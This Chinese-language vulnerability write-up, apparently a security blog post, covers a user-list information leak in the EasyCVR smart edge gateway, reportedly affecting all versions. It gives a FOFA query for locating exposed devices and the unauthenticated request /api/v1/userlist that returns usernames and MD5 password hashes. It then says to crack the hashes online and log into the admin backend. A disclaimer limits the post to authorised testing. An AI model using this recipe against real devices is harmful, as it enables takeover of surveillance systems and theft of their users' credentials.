EasyCVR智能边缘网关用户信息泄漏漏洞
- 免责声明
- 漏洞描述
- 漏洞影响
- 漏洞危害
- 网络测绘
- Fofa: title="EasyCVR"
- 漏洞复现
- 1. 构造poc
- 2. 获取管理员账户密码
- 3. 登录后台
免责声明
仅用于技术交流,目的是向相关安全人员展示漏洞利用方式,以便更好地提高网络安全意识和技术水平。
任何人不得利用该文章进行非法攻击和侵犯他人的隐私和财产权利。一旦发生任何违法行为,责任自负。
该文章仅用于授权测试,任何未经授权的测试均属于非法行为。请在法律许可范围内使用。
作者对使用该文章导致的任何直接或间接损失不承担任何责任。使用此文章的风险由使用者自行承担。
漏洞描述
EasyCVR智能边缘网关是一种基于边缘计算和人工智能技术的设备,旨在提供高效的视频监控和智能分析解决方案。它结合了视频监控摄像头、计算能力和网络连接,能够在现场进行视频数据处理和分析,减轻对中心服务器的依赖。EasyCVR智能边缘网关存在userlist 信息泄漏,攻击者可以直接登录后台,进行非法操作。
漏洞影响
全版本
漏洞危害
攻击者可以直接登录后台,进行非法操作。
网络测绘
Fofa: title=“EasyCVR”
漏洞复现
1. 构造poc
/api/v1/userlist?pageindex=0&pagesize=10
2. 获取管理员账户密码
name字段为用户名
password字段为密码的md5值,可通过在线解密网站解密
3. 登录后台
